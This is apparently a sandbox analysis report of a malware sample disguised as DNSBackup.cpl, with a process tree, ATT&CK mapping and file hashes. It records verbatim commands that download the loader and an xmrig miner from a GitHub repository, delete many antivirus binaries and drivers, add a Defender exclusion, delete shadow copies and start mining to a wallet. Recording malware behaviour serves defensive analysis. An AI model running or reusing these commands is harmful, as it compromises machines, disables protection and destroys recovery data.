        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5844,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:1
        5⤵
        
        PID:4576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5436,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6096 /prefetch:1
        5⤵
        
        PID:3780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6664 /prefetch:8
        5⤵
        
        PID:380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6664 /prefetch:8
        5⤵
        
        PID:3552
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6660,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:8
        5⤵
        
        PID:3116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6864,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6748 /prefetch:8
        5⤵
        
        PID:3636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=5112,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6860 /prefetch:1
        5⤵
        
        PID:5444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6808,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:1
        5⤵
        
        PID:5496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=6344,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:1
        5⤵
        
        PID:5560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5920,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:8
        5⤵
        
        PID:5872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5984,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=6064 /prefetch:8
        5⤵
        
        PID:5880
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7248,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:8
        5⤵
        
        PID:5960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7280,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=7424 /prefetch:8
        5⤵
        
        PID:5968
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7264,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=7596 /prefetch:8
        5⤵
        
        PID:6060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7772,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=7764 /prefetch:8
        5⤵
        
        PID:3368
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=4564 /prefetch:8
        5⤵
        
        PID:7108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:8
        5⤵
        
        PID:7116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5952,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=4944 /prefetch:8
        5⤵
        
        PID:7124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5572,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=4920 /prefetch:8
        5⤵
        
        PID:7076
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=7932,i,8843362237762708885,13578408215132624561,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:8
        5⤵
        
        PID:2200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  PID:5656
- - C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    PID:5744
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\ProgramData\DNSBackup\DNSBackup.cpl
      4⤵
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5764

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:412

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\rundll32.exe" shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
1⤵
PID:5328
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
1⤵
PID:2472
- C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Loads dropped DLL
    - Drops desktop.ini file(s)
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3748
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Windows Defender\MpCmdRun.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5932
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Windows Defender\MsMpEng.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5872
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Windows Defender\NisSrv.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6092
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\WdBoot.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6112
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\WdFilter.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1064
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\WdNisDrv.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5252
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\srtsp.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5760
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\McAfee\MSC\mcshield.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Common Files\McAfee\mfemms.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Common Files\McAfee\masvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:388
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Common Files\McAfee\mcsvhost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6016
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\McAfee\Endpoint Security\Firewall\mfefire.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\klif.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3092
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdservicehost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6020
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdredline.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3928
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdparentalservice.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1896
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdncscv.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1512
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\ESET\ESET Security\egui.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4196
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\ESET\ESET Security\ekrn.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2388
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\eamonm.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5280
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\ehdrv.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6048
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\AVAST Software\Avast\avastsvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5272
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\AVAST Software\Avast\avastui.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5872
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\AVAST Software\Avast\aswidsagent.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6092
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Windows\System32\drivers\aswSnx.sys"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6112
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\AVG\Antivirus\avgemc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5400
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Trend Micro\Titanium\coreServiceShell.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5252
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Trend Micro\Titanium\TmListen.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5572
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Trend Micro\Titanium\TMBMSRV.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4716
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4840
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Sophos\Sophos Anti-Virus\SophosUI.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /F /Q "C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3356
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell Invoke-WebRequest -Uri http://raw.githubusercontent.com/SC10001/Di/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:6032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Invoke-WebRequest -Uri http://raw.githubusercontent.com/SC10001/Di/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1824
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5424
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "if (Get-Command Get-ADComputer -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }"
      4⤵
      Hide Artifacts: Ignore Process Interrupts
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:6108
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell Invoke-WebRequest -Uri https://www.python.org/ftp/python/3.6.8/python-3.6.8.exe -Outfile C:\WinXRAR\python-3.6.8.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:6116
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4624
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Invoke-WebRequest -Uri https://www.python.org/ftp/python/3.6.8/python-3.6.8.exe -Outfile C:\WinXRAR\python-3.6.8.exe
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5400
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4696
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
      - C:\Users\Admin\AppData\Local\Temp\2B91A969-34A9-497C-AD0B-2616AB71227E\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\2B91A969-34A9-497C-AD0B-2616AB71227E\dismhost.exe {6ADCA2CD-17F1-4F8B-B579-7CAD819BDF2B}
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:5896
  - - \??\c:\Windows\system32\wbem\wmic.exe
      c:\MblKIz\MblK\..\..\Windows\MblK\MblK\..\..\system32\MblK\MblK\..\..\wbem\MblK\MblKI\..\..\wmic.exe shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6432
  - - \??\c:\Windows\system32\wbem\wmic.exe
      c:\AIVcpl\AIVc\..\..\Windows\AIVc\AIVc\..\..\system32\AIVc\AIVc\..\..\wbem\AIVc\AIVcp\..\..\wmic.exe shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:824
  - - C:\WinXRAR\xmrig.exe
      C:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/0
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      PID:7100
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Install-WindowsFeature -Name RSAT-AD-PowerShell"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5340
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Install-WindowsFeature -Name RSAT-AD-PowerShell"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:8

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5960

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6584

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\DNSBackup\DNSBackup.cpl

Filesize
2.1MB

MD5
1591c716c20a2a4fc5c7f65a97bf5008

SHA1
83bae7c7e5b2c2a61bd4382b9214118f572fca6f

SHA256
fdaa002eab9dd2fd33922fc9ff8f0f0da773e05d40f5dd42e195ace0276a08b8

SHA512
0035384c125168059788dcfd77cd9923fe0560c06d77746e669e4f11211f1cfcf7e396015ed653bd3b537ac2019f681c682744055a23b8b2bf3cc3f0bb404cc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
fed4ab68611c6ce720965bcb5dfbf546

SHA1
af33fc71721625645993be6fcba5c5852e210864

SHA256
c41acdf5d0a01d5e9720ef9f6d503099950791b6f975ba698ccd013c4defa8c4

SHA512
f9ab23b3b4052f7fda6c9a3e8cd68056f21da5d0fcf28061331900cac6f31ef081705804d9a9d4103ee7d9c9bdb6aa4237987b7e821d2d96cd52da24219e55ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
4013ebc7b496bf70ecf9f6824832d4ae

SHA1
cfdcdac5d8c939976c11525cf5e79c6a491c272a

SHA256
fb1a67bdc2761f1f9e72bbc41b6fc0bf89c068205ffd0689e4f7e2c34264b22a

SHA512
96822252f121fb358aa43d490bb5f5ce3a81c65c8de773c170f1d0e91da1e6beb83cb1fb9d4d656230344cd31c3dca51a6c421fda8e55598c364092232e0ad22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
86cb2fa6b11f824d3a6294fab5ac8324

SHA1
ef0ded994e8ffd9b76b34ba6e8eaf8bfba5cdd80

SHA256
0c1a55e8b5f7f7c7263d7154771852fa149a0184292234ae51ed738515d5fa51

SHA512
